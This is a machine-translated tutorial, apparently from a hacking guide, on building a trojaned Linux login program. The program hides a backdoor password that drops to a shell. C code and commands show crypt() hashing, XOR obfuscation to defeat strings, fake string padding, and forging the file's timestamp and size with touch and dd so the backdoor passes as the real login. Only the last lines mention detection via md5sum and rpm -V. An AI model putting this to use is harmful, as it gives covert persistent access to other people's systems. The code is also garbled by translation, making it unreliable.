Hacker technology advanced skills and practice Linux backdoors

Backdoor password encrypted, using the DES algorithm 1, the crypt () function, write gen.c program: # include main (intargc, char * argv []) {if (argc! = 3) {printf ("usage:% s \n", argv [0]); exit (1);}

printf("%s\n",crypt(argv[1],argv[2]));} 2. compile-gen, perform., the shadow/genhackui result UiVqMWvDrIQjA. 3. modify the source code ulogin.c: back door--redaction forms of password in place of the macro in the define ulogin.c PASSWORD value. --If the backdoor password incorrect, directly to a Shell: if (! strcmp (PASSWORD, crypt (display, PASSWORD))) {system (SHELL); exit (1);} Use strings command can only see the encrypted password. Use exclusive-or (XOR) algorithm, a string in hexadecimal representation, in order to achieve the non-printable effect. 1, encoding program encode.c: charmagic [] = "\x71\x67\x6d\x7a\x65\x61\x7a"; char * de (char * str, char * key) {inti = 0, j = 0, len; len = strlen (key); while (str [I]! = ' \0 ') {str [I] ^ = key [j]; j ++; if (j = = len), j = 0; I ++;} returnstr;} voiddisplay(char*str){inti;for(i=0;i main(){chargets[100],*ptr;ptr=gets;scanf("%s",ptr);de(ptr,magic);display(ptr);} 2. compile the encode, get key string executed sequentially and magic string XOR result, for example the filename of the original login/sbin/xlogin, exclusive or after: \x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb3, in such a definition in the source code of the back door: Car login [] = "\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb"; And then insert the XOR function, char * de () with the same magic strings, we can figure out the correct backdoor passwords. Use strings command cannot see passwords, path string. Last modified so that the backdoor ulogin of strings output similar to the normal login strings output, practices: the code in ulogin.c by adding a string array charstrings [] = ""; fill in the quotation marks, the normal login program strings output. Confused as real ones, to increase the temptation. Adjust the backdoor's file date, size, and other properties: 1, date # ls-l/sbin/xlogin-r-sr-xr-xrootroot19300Feb111998/sbin/xlogin # touch-t199802110000ulogin # _ 2, size # ls-lulogin/sbin/xlogin-r-sr-xr-xrootroot7542Feb111998ulogin-r-sr-xr-xrootroot19300Feb111998/sbin/xlogin # bc 19300-7542 11758 # ddif =/sbin/xloginof =/tmp/tbs = 11758count = 1 1 + 1 + 0recordsout 11758bytestransferredin0.000379secs 0recordsin (31016746 bytes/sec) # cat/tmp/t > > Login backdoor ulogin detection using the command md5sum on the existing/bin/login file for verification, and the previous value for comparison. Use the RPM checksum RedHatLinux: # rpm-Vutil-linux intruders have used backdoor login, who will not be visible to users, see the system process, find login-hxxx.xxx.xxx.xxx.